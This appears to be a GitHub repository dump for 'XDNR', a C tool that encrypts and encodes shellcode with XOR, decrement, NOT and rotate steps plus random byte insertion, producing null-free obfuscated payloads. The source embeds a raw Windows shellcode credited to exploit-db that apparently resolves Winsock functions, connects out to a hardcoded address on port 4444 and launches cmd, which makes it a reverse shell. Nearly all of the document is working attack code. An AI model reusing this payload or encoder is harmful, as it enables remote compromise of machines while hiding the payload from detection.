├── README.md └── xdnr.c /README.md: -------------------------------------------------------------------------------- 1 | ### XDNR 2 | 3 | ---------- 4 | 5 | ![Language](https://img.shields.io/badge/Language-C-yellow) 6 | ![last_commit](https://img.shields.io/github/last-commit/xen0vas/XDNR) 7 | 8 | 9 | #### compile and run : 10 | 11 | ``` 12 | gcc xdnr.c -o xdnr 13 | chmod +x xdnr 14 | ./xdnr 15 | ``` 16 | 17 | ---------- 18 | 19 | #### Description : 20 | 21 | XDNR is a X0R Cryptor along with DEC/N0T/R0R encoder plus random byte insertion encoder, 22 | which generates null free encrypted and encoded shellcodes 23 | 24 | 25 | ![xdnr](https://user-images.githubusercontent.com/12726776/163715727-b03b23ec-b501-4df4-8759-734790904649.gif) 26 | -------------------------------------------------------------------------------- /xdnr.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /** 4 | * 5 | * ____ ___________ _______ __________ 6 | * \ \/ /\______ \ \ \\______ \ 7 | * \ / | | \ / | \| _/ 8 | * / \ | ` \/ | \ | \ 9 | * /___/\ \/_______ /\____|__ /____|_ / 10 | * \_/ \/ \/ \/ 11 | * 12 | * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 13 | * 14 | * [*] X0R Cryptor with DEC/N0T/R0R encoder plus random byte insertion encoder 15 | * [*] Author: @xen0vas 16 | * 17 | * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 18 | * 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #define DEC 0x2 // the value that will be used to substract every byte 27 | 28 | #define ANSI_COLOR_RED "\x1b[01;31m" 29 | #define ANSI_COLOR_GREEN "\x1b[01;32m" 30 | #define ANSI_COLOR_YELLOW "\x1b[01;33m" 31 | #define ANSI_COLOR_BLUE "\x1b[01;34m" 32 | #define ANSI_COLOR_MAGENTA "\x1b[01;35m" 33 | #define ANSI_COLOR_CYAN "\x1b[01;36m" 34 | #define ANSI_COLOR_RESET "\x1b[0m" 35 | 36 | unsigned char XORKEY[] = { 0x73, 0x65, 0x63, 0x72, 0x65, 0x74, 0x6B, 0x65, 0x79 }; // secretkey 37 | 38 | /* https://www.exploit-db.com/shellcodes/50291 */ 39 | unsigned char shellcode[] = \ 40 | "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b" 41 | "\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31" 42 | "\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f" 43 | "\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde" 44 | "\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53" 45 | "\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54" 46 | "\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33" 47 | "\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04" 48 | "\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68" 49 | "\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc" 50 | "\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c" 51 | "\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68" 52 | "\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06" 53 | "\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b" 54 | "\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63" 55 | "\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c" 56 | "\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83" 57 | "\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61" 58 | "\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72" 59 | "\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64" 60 | "\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57" 61 | "\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52" 62 | "\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50" 63 | "\x52\x52\x51\x52\xff\xd5"; 64 | 65 | void banner(){ 66 | printf(ANSI_COLOR_YELLOW); 67 | printf(" \n"); 68 | printf(" ▄ ▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ \n"); 69 | printf(" ▐░▌ ▐░▌▐░░░░░░░░░░▌ ▐░░▌ ▐░▌▐░░░░░░░░░░░▌ \n"); 70 | printf(" ▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌░▌ ▐░▌▐░█▀▀▀▀▀▀▀█░▌ \n"); 71 | printf(" ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ \n"); 72 | printf(" ▐░▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄█░▌ \n"); 73 | printf(" ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ \n"); 74 | printf(" ▐░▌░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░█▀▀▀▀█░█▀▀ \n"); 75 | printf(" ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░▌ \n"); 76 | printf(" ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▐░▌▐░▌ ▐░▌ \n"); 77 | printf(" ▐░▌ ▐░▌▐░░░░░░░░░░▌ ▐░▌ ▐░░▌▐░▌ ▐░▌ \n"); 78 | printf(" ▀ ▀ ▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀ ▀ ▀ \n"); 79 | printf(" \n\n"); 80 | printf("[*] Author:"ANSI_COLOR_MAGENTA" @xen0vas "ANSI_COLOR_RESET"\n"); 81 | } 82 | 83 | int main(void) 84 | { 85 | banner(); 86 | printf(ANSI_COLOR_YELLOW"[*] X0R Cryptor with DEC/N0T/R0R encoder v1.0.1\n\n"); 87 | printf(ANSI_COLOR_BLUE); 88 | printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"); 89 | printf(ANSI_COLOR_RESET); 90 | 91 | int rot,kk,ll,i,l,k,j; 92 | 93 | int key_len = sizeof(XORKEY); 94 | 95 | lol: 96 | 97 | rot = 4; //right rotation 4 bits 98 | unsigned char *buffer = (unsigned char*)malloc(sizeof(unsigned char)); 99 | srand((unsigned int)time(NULL)); 100 | 101 | unsigned char *shellcode2 =(unsigned char*)malloc(sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) ); 102 | memset(shellcode2, '\0', sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) ); 103 | 104 | // placeholder to copy the random bytes using rand 105 | unsigned char shellcode3[] = "\xbb"; 106 | 107 | unsigned char *shellcode4 = (unsigned char*)malloc(sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) ); 108 | memset(shellcode4, '\0', sizeof(char*) * (((sizeof(shellcode)-1)*2)/8) ); 109 | 110 | l = 0; 111 | k = 0; 112 | 113 | // random byte insertion into even location 114 | /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ 115 | 116 | for (i=0; i<((sizeof(shellcode)-1)*2); i++) 117 | { 118 | // generate random bytes 119 | buffer[0] = rand() & 0xff; 120 | memcpy(&shellcode3[0],(char*)&buffer[0],sizeof(buffer[0])); 121 | k = i % 2; 122 | if (k == 0) 123 | { 124 | shellcode2[i] = shellcode[l]; 125 | l++; 126 | } 127 | else if ( k != 0 ) 128 | { 129 | shellcode2[i] = shellcode3[0]; 130 | } 131 | } 132 | 133 | kk = 0; 134 | ll = 0; 135 | 136 | // Beat the nulls ! 137 | buffer[0] = rand() & 0xff; 138 | 139 | for (i=0; i<(sizeof(shellcode)-1)*2; i++) 140 | { 141 | 142 | if (kk == key_len) kk = 0; 143 | 144 | // XOR every byte with secretkey 145 | shellcode2[i] = shellcode2[i] ^ XORKEY[kk]; 146 | 147 | shellcode2[i] = shellcode2[i] ^ buffer[0]; 148 | 149 | printf ("\r"ANSI_COLOR_YELLOW"[!]"ANSI_COLOR_GREEN" The magic byte to avoid nulls :"ANSI_COLOR_RED" 0x%02x"ANSI_COLOR_RESET, buffer[0] ); 150 | 151 | // subtract every byte by 2 152 | shellcode2[i] = shellcode2[i] - DEC; 153 | 154 | // one's complement negation 155 | shellcode2[i] = ~shellcode2[i]; 156 | 157 | // perform the ROR method 158 | shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot)); 159 | 160 | if (shellcode2[i] == 0) 161 | { 162 | free(shellcode4); 163 | free(shellcode2); 164 | free(buffer); 165 | ll++; 166 | break; 167 | } 168 | 169 | kk++; 170 | } 171 | if ( ll > 0) goto lol; 172 | 173 | /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ 174 | 175 | for (i=0; i<(sizeof(shellcode)-1)*2; i++) { 176 | memcpy(&shellcode4[i], (unsigned char*)&shellcode2[i],sizeof(shellcode2[i])); 177 | } 178 | 179 | printf(ANSI_COLOR_YELLOW"\n[*]"ANSI_COLOR_GREEN" The secret Key : "); 180 | for (int g=0; g<=key_len-1; g++) 181 | { 182 | if (g == key_len-1) 183 | printf(ANSI_COLOR_RED"0x%02x"ANSI_COLOR_RESET, XORKEY[g]); 184 | else 185 | printf(ANSI_COLOR_RED"0x%02x, "ANSI_COLOR_RESET, XORKEY[g]); 186 | } 187 | 188 | printf("\n"ANSI_COLOR_YELLOW"[*]"ANSI_COLOR_GREEN" Original Shellcode Length : "ANSI_COLOR_RED"%lu\n\n", sizeof(shellcode)-1); 189 | 190 | printf(ANSI_COLOR_BLUE); 191 | printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"); 192 | printf(ANSI_COLOR_RESET); 193 | 194 | printf("\n\n"ANSI_COLOR_YELLOW"[-]"ANSI_COLOR_GREEN" Encrypted shellcode :"ANSI_COLOR_RESET"\n\n"); 195 | 196 | 197 | for (i=0; i<(sizeof(shellcode)-1)*2; i++) 198 | { 199 | if (i==0) 200 | printf(ANSI_COLOR_MAGENTA"unsigned char"ANSI_COLOR_RESET" shellcode[]"ANSI_COLOR_YELLOW" = "ANSI_COLOR_RESET"{ "ANSI_COLOR_YELLOW"0x%02x, "ANSI_COLOR_RESET"",shellcode4[i]); 201 | if (i>0 && i<((sizeof(shellcode)-1)*2)-1) 202 | printf(ANSI_COLOR_YELLOW"0x%02x, "ANSI_COLOR_RESET"",shellcode4[i]); 203 | if (i == ((sizeof(shellcode)-1)*2)-1) 204 | printf(ANSI_COLOR_YELLOW"0x%02x"ANSI_COLOR_RESET" };",shellcode4[i]); 205 | } 206 | 207 | printf("\033[01;32m"); 208 | printf("\n\n"ANSI_COLOR_YELLOW"[-]"ANSI_COLOR_GREEN" Encoded Shellcode Length : "ANSI_COLOR_RED"%ld\n"ANSI_COLOR_RESET,(sizeof(shellcode)-1)*2); 209 | printf("\n\n"); 210 | return 0; 211 | } 212 | 213 | /* @xen0vas */ 214 | 215 | --------------------------------------------------------------------------------